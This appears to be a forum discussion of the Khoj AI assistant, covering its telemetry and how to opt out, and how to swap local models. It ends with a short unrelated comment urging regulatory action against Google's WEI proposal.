What's the posthog telemetry used for? Why is there nothing on it in the docs? Why no clear way to opt out?
It's pretty easy to remove which is what I ended up doing. The project works remarkably well otherwise.
Thanks for pointing that out!
We use it for understanding usage -- like determining whether people are using markdown or org or more.
Everything is collected entirely anonymized, and no identifiable information is ever sent to the telemetry server.
To opt-out, you set the `should-log-telemetry` value in `khoj.yml` to false. Updated the docs to include these instructions and what we collect -- https://docs.khoj.dev/#/telemetry.
I see you're using gpt4all; do you have a supported way to change the model being used for local inference?
A number of apps that are designed for OpenAI's completion/chat APIs can simply point to the endpoints served by llama-cpp-python [0], and function in (largely) the same way, while using the various models and quants supported by llama.cpp. That would allow folks to run larger models on the hardware of their choice (including Apple Silicon with Metal acceleration or NVIDIA GPUs) or using other proxies like openrouter.io. I enjoy openrouter.io myself because it supports Anthropic's 100k models.
No, we don't yet. Lots of developer folks want to try different models, we want to provide simple to use, but deep assistance. Kind of unsure what to focus on given our limited resources.
The point of gpt4all is that you can change the model with minimal breaking. You should be able to change this line https://github.com/khoj-ai/khoj/blob/master/src/khoj/process... to the model you want. You'll need to build your own local image with docker-compose but should be relatively straight forward.
Have anyone got something valuable from talking to your second brain? What kind of conversations
It looks like they do not care if they have consensus or approval for WEI, they are implementing it regardless.
Wherever you live, you should contact your government representatives and regulators and put a spotlight on this issue for what it is--monopoly abuse of power.
Grassroots efforts are great and it is good to let your friends, family, and associates know what they are doing and why it is wrong. However, government regulation of this abuse is needed to stop it by force of law.